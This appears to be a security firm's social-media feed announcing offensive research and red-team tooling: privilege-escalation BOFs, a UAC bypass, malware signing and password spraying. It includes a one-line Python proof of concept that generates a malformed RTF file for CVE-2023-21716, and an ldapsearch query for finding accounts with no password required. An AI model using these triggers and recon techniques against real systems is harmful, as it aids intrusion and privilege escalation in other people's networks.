Northwave Labs

From Theory to Practice: Kernel Heap Spray Exploitation for Privilege Escalation💥 Part two of the blog series by my colleague Alex: northwave-cybersecurity.com/exploiting-ent…

As the icing on the cake, they shared the complete functional exploit with @OutflankNL for utilisation by their Outflank Security Tooling (OST) customers, enhancing global cyber resilience! (2/2)

Last weekend @tijme presented Elevate & Conquer: A Journey Into Kernel Exploitation, at @BSidesLondon. The presentation explores his and Alex's research on exploiting a zero-day in VPN software, used by 40,000+ organisations worldwide! (1/2) northwave-cybersecurity.com/ivanti-pulse-v…

New offensive trade-craft added to OST: hijacks for Electron apps. This evasion technique is primarily useful for persistence. Our implementation was inspired upon work done by the @NorthwaveLabs team.

I dived into exploiting leaked code signing certificates to sign malware ✍. A technique that has been actively abused in the wild by threat actors for a long time. Blog post: tij.me/blog/finding-a…

Thrilled to announce that I'll be giving a 2-hour Kernel Driver Exploitation lab at @HITBSecConf, together with my colleague Jan-Jaap. 🥳 If you want to develop your first malicious kernel driver (exploit), join us the 21st of April in Amsterdam!

CVE-2023-21716 Python PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

Our red teamer @Expl0itabl3 ported MDI check instance to Python. Use it to your advantage, check if your target uses Microsoft Defender for Identity during your recon phase. github.com/expl0itabl3/ch…

Cobalt Strike BOF that utilises AMD's Ryzen Master kernel driver to read and write physical memory. It currently escalates privileges from administrator to SYSTEM. Future goal is to add features such as disabling EDR, disabling ETW TI or dumping LSASS. github.com/tijme/amd-ryze…

Northwave has conducted research into the psychological effects of a ransomware crisis on people involved in mitigating a ransomware attack. The findings reveal the deep marks that a ransomware crisis leaves on all those affected. northwave-security.com/wp-content/upl…

Cobalt Strike BOF to bypass UAC via the CMSTPLUA COM interface. It masquerades PEB and utilises COM Elevation Moniker on the CMSTPLUA COM object to execute commands in an elevated context. github.com/tijme/cmstplua…

90% of my Twitter DMs are asking me about how to start getting into Malware development. Well, I love answering them but it's easier to write a small thread about it so here we go. 1/12

Cobalt Strike BOF foundation for kernel exploitation using CVE-2021-21551. In its current state, as a PoC, it overwrites the beacon token with the system token (privesc). github.com/NorthwaveSecur…

Windows 11 (May) + Office Pro Plus (April) + Preview pane enabled

Interesting maldoc was submitted from Belarus. It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code. virustotal.com/gui/file/4a240…

NW’s specialists examined #Conti's internal conversations, released during the recent #leak. Extensive analysis resulted in findings never published before, from IP addresses to the method of determining the actors’ real identities. Access full blog here: #source" target="_blank" rel="nofollow noopener">northwave-security.com/when-the-hacke…

Pull requests: Spray-AD: github.com/outflanknl/Spr… SharpHose: github.com/ustayready/Sha… Kerbrute: github.com/ropnop/gokrb5/…

Search for AD accounts with the "PASSWD_NOTREQD" flag in CobaltStrike: ldapsearch (&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2))) cn

While this may sound too simple, we've managed to escalate across domains on several occasions by accounts with blank passwords 🔥! In this blog we describe how it works, and which popular spraying tools we've updated to support empty password spraying: northwave-security.com/abusing-empty-…